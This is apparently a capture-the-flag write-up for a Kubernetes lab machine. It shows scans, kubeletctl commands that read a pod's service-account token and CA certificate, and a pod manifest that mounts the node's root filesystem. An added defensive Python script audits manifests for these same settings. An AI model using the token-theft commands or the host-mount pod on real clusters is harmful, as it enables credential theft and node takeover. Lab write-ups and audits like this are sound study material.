Steamcloud

- 2 mins read

Machine: Linux Difficulty: Easy #Kubernetes #cloud

IP: 10.10.14.149

PortScanner

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 08:33 -03
Nmap scan report for 10.10.11.133 (10.10.11.133)
Host is up (0.13s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE          VERSION
22/tcp    open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
2379/tcp  open  ssl/etcd-client?
2380/tcp  open  ssl/etcd-server?
8443/tcp  open  ssl/https-alt
10249/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
10250/tcp open  ssl/http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

DirScanner

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, md, text, bak, zip, toml, conf | HTTP method: GET | Threads: 25 | Wordlist size: 14139

Output File: /home/parallels/reports/http_10.10.11.133_10249/_24-02-14_08-38-31.txt

Target: http://10.10.11.133:10249/

[08:38:31] Starting: 
[08:39:17] 200 -    2B  - /healthz                                          
[08:39:25] 200 -   37KB - /metrics          

Kubernetes API

Select the only pod that is not in the kube-system namespace; in this case that is the nginx pod.

user.txt

root.txt

  • We need to get the ca.crt and the service-account token to authenticate to the cluster

  • Grab the token
    • kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
  • Grab the CA certificate
    • ./kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee ca.crt
  • Check what the token is allowed to do (look for the create permission on pods) using the token and the CA certificate
    • kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
  • Using the official command-line client, kubectl

kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

Create a pod whose container has the node's root filesystem mapped into it. Then exec into the pod and read the mapped volume, which is the full filesystem of the host.

  • Evil file
apiVersion: v1
kind: Pod
metadata:
  name: evilpod        # pod names must be lowercase RFC 1123 subdomains; "evilPod" is rejected by the API server
  namespace: default
spec:
  containers:
  - name: evilpod      # container names have the same lowercase restriction
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /mnt  # the node's root filesystem appears under /mnt inside the container
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

kubectl apply -f r.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$(cat token)
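As an added defender's check (not part of the original write-up), the following Python script audits a Pod manifest for exactly the settings the pod above relies on: a hostPath mount of the node root, hostNetwork, and an automounted service-account token. It is the kind of logic an admission webhook or a periodic audit over `kubectl get pods -A -o json` would run so that such a pod is rejected or alerted on rather than scheduled. It uses only the standard library; the two sample manifests are constructed here, one mirroring the write-up's pod and one a plain web pod, and the function names are this example's own.

```python
"""Audit a Kubernetes Pod manifest for node-escape settings.

Added example, not from the original write-up: a defender-side check
that flags hostPath mounts of sensitive node paths, host namespaces,
privileged containers and an automounted service-account token.
"""
import json
from typing import Dict, List

# Host path prefixes that expose the node once mounted into a container
# (the node root "/" is handled separately in _is_sensitive).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/lib/kubelet", "/var/run/docker.sock")


def _is_sensitive(path: str) -> bool:
    """True if a hostPath is the node root or sits under a sensitive prefix."""
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_pod(pod: Dict) -> List[str]:
    """Return findings for one Pod object; an empty list means nothing was flagged."""
    findings: List[str] = []
    spec = pod.get("spec", {})
    name = pod.get("metadata", {}).get("name", "<unnamed>")

    # Map volume name -> host path so each mount can be traced back to the node.
    host_volumes = {
        v["name"]: v["hostPath"].get("path", "")
        for v in spec.get("volumes", []) or []
        if "hostPath" in v
    }

    for c in spec.get("containers", []) or []:
        for m in c.get("volumeMounts", []) or []:
            host_path = host_volumes.get(m.get("name"))
            if host_path is not None and _is_sensitive(host_path):
                findings.append(
                    f"{name}: container '{c.get('name')}' mounts host path "
                    f"'{host_path}' at '{m.get('mountPath')}'"
                )
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"{name}: container '{c.get('name')}' is privileged")

    # Each host namespace removes one isolation boundary between pod and node.
    for key in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(key):
            findings.append(f"{name}: {key} is enabled")

    # The token automount defaults to true; a pod that never talks to the API
    # server should opt out so a compromise does not hand over cluster credentials.
    if spec.get("automountServiceAccountToken", True) is not False:
        findings.append(f"{name}: service-account token is automounted")

    return findings


def audit_manifest(text: str) -> List[str]:
    """Parse a JSON Pod manifest (as 'kubectl get pod -o json' emits) and audit it."""
    obj = json.loads(text)
    if obj.get("kind") != "Pod":
        raise ValueError(f"expected a Pod, got {obj.get('kind')!r}")
    return audit_pod(obj)


# Constructed sample: the same settings as the write-up's pod manifest.
EVIL_POD_JSON = json.dumps({
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "evilpod", "namespace": "default"},
    "spec": {
        "containers": [{"name": "evilpod", "image": "nginx:1.14.2",
                        "volumeMounts": [{"mountPath": "/mnt", "name": "hostfs"}]}],
        "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
})

# Constructed sample: an ordinary web pod with no host access and no token.
SAFE_POD_JSON = json.dumps({
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "web", "namespace": "default"},
    "spec": {
        "containers": [{"name": "web", "image": "nginx:1.14.2",
                        "volumeMounts": [{"mountPath": "/cache", "name": "scratch"}]}],
        "volumes": [{"name": "scratch", "emptyDir": {}}],
        "automountServiceAccountToken": False,
    },
})

if __name__ == "__main__":
    for text in (EVIL_POD_JSON, SAFE_POD_JSON):
        for line in audit_manifest(text) or ["clean"]:
            print(line)
```

Run against the write-up's manifest the audit reports three findings (root hostPath mount, hostNetwork, automounted token) and none for the plain web pod. The same checks map directly onto the Pod Security Standards "baseline" and "restricted" profiles, which is the built-in way to block this pod class at the namespace level.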